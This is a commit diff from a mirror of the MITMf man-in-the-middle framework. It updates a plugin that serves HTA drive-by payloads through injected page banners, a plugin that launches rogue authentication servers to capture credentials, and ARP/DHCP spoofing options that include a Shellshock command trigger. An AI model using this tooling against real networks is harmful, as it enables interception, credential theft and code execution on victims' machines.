mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-08-19 21:13:26 -07:00
responder code is now up to date with the lastest version
logging is going to have to get cleaned up, but that's a minor issue re-implemented the function to add endpoints to the http server added an option to manually specify the gateways mac in the Spoofer plugin
This commit is contained in:
parent
c527dc1d21
commit
772ef9ab39
12 changed files with 375 additions and 332 deletions
|
@ -30,24 +30,18 @@ class HTADriveBy(Inject, Plugin):
|
|||
def initialize(self, options):
|
||||
self.bar_text = options.text
|
||||
self.ip = options.ip
|
||||
self.hta = options.hta_app.split('/')[-1]
|
||||
Inject.initialize(self, options)
|
||||
self.html_payload = self.get_payload()
|
||||
|
||||
from core.servers.HTTP import HTTP
|
||||
def hta_request(path):
|
||||
if path == options.hta_app.split('/')[-1]:
|
||||
with open(options.hta_app) as hta_file:
|
||||
resp = flask.Response(hta_file.read())
|
||||
|
||||
resp.headers['Content-Type'] = "application/hta"
|
||||
return resp
|
||||
|
||||
HTTPserver().add_endpoint(hta_request)
|
||||
HTTP.add_static_endpoint(self.hta, "application/hta", options.hta_app)
|
||||
|
||||
def get_payload(self):
|
||||
with open("./core/html/htadriveby.html", 'r') as file:
|
||||
payload = re.sub("_TEXT_GOES_HERE_", self.bar_text, file.read())
|
||||
payload = re.sub("_IP_GOES_HERE_", self.ip, payload)
|
||||
payload = re.sub("_PAYLOAD_GOES_HERE_", self.hta, payload)
|
||||
return payload
|
||||
|
||||
def options(self, options):
|
||||
|
|
|
@ -44,30 +44,37 @@ class Responder(Plugin):
|
|||
|
||||
if self.config["Responder"]["SQL"].lower() == "on":
|
||||
from core.servers.MSSQL import MSSQL
|
||||
self.tree_info.append("MSSQL server [ON]")
|
||||
MSSQL().start()
|
||||
|
||||
if self.config["Responder"]["Kerberos"].lower() == "on":
|
||||
from core.servers.Kerberos import Kerberos
|
||||
self.tree_info.append("Kerberos server [ON]")
|
||||
Kerberos().start()
|
||||
|
||||
if self.config["Responder"]["FTP"].lower() == "on":
|
||||
from core.servers.FTP import FTP
|
||||
self.tree_info.append("FTP server [ON]")
|
||||
FTP().start()
|
||||
|
||||
if self.config["Responder"]["POP"].lower() == "on":
|
||||
from core.servers.POP3 import POP3
|
||||
self.tree_info.append("POP3 server [ON]")
|
||||
POP3().start()
|
||||
|
||||
if self.config["Responder"]["SMTP"].lower() == "on":
|
||||
from core.servers.SMTP import SMTP
|
||||
self.tree_info.append("SMTP server [ON]")
|
||||
SMTP().start()
|
||||
|
||||
if self.config["Responder"]["IMAP"].lower() == "on":
|
||||
from core.servers.IMAP import IMAP
|
||||
self.tree_info.append("IMAP server [ON]")
|
||||
IMAP().start()
|
||||
|
||||
if self.config["Responder"]["LDAP"].lower() == "on":
|
||||
from core.servers.LDAP import LDAP
|
||||
self.tree_info.append("LDAP server [ON]")
|
||||
LDAP().start()
|
||||
|
||||
def reactor(self, strippingFactory):
|
||||
|
|
|
@ -93,6 +93,7 @@ class Spoof(Plugin):
|
|||
options.add_argument('--netmask', dest='netmask', type=str, default='255.255.255.0', help='The netmask of the network')
|
||||
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
||||
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
||||
options.add_argument('--gatewaymac', dest='gatewaymac', help='Specify the gateway MAC [will auto resolve if ommited]')
|
||||
options.add_argument('--targets', dest='targets', help='Specify host/s to poison [if ommited will default to subnet]')
|
||||
options.add_argument('--ignore', dest='ignore', help='Specify host/s not to poison')
|
||||
options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue